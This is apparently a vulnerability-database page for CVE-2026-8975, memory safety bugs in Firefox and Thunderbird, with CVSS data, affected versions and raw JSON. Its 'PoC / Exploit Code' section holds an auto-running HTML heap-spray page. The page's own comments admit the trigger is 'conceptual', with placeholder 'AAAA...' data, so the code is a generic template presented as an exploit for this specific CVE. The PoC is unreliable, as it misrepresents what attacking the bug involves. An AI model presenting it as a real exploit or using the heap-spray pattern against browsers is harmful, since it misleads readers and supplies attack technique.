Security Vulnerability Report
CVE-2026-8975 CVSS 9.8 CRITICAL

Published: 2026-05-19 14:16:54
Last Modified: 2026-05-19 18:16:38

Description

Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Firefox < 151
Firefox ESR < 115.36
Firefox ESR < 140.11
Thunderbird < 151
Thunderbird < 140.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  Proof of Concept (PoC) for CVE-2026-8975
  This script attempts to trigger the memory corruption vulnerability
  in vulnerable versions of Firefox/Thunderbird.
-->
<html>
<head>
  <title>CVE-2026-8975 PoC</title>
</head>
<body>
  <script>
    function trigger_bug() {
      // Simulate memory allocation pattern to corrupt heap
      var payload_size = 0x2000;
      var spray = new Array(100);

      // Heap spraying preparation
      for (var i = 0; i < spray.length; i++) {
        spray[i] = new Uint8Array(payload_size);
        // Fill with pattern that might trigger corruption
        for (var j = 0; j < payload_size; j++) {
          spray[i][j] = 0x41; // 'A'
        }
      }

      // Attempt to invoke vulnerable function (Conceptual)
      // In a real scenario, specific API calls or DOM manipulation would be used here
      try {
        var vulnerable_obj = document.createElement('object');
        // Malicious data assignment to trigger memory safety bug
        vulnerable_obj.data = "AAAA...";
        document.body.appendChild(vulnerable_obj);
      } catch (e) {
        console.log("Exception caught: " + e.message);
      }
    }

    // Auto-trigger on load
    window.onload = trigger_bug;
  </script>
  <h1>CVE-2026-8975 Memory Corruption Test</h1>
  <p>If the browser crashes or exhibits unusual behavior, it may be vulnerable.</p>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8975", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:54.090", "lastModified": "2026-05-19T18:16:37.700", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://bugzilla.mozilla.org/buglist.cgi?bug_id=1860195%2C2029325%2C2029429%2C2029910%2C2035915%2C2038678%2C2038669", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-47/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-48/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-50/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-51/", "source": "[email protected]"}]}}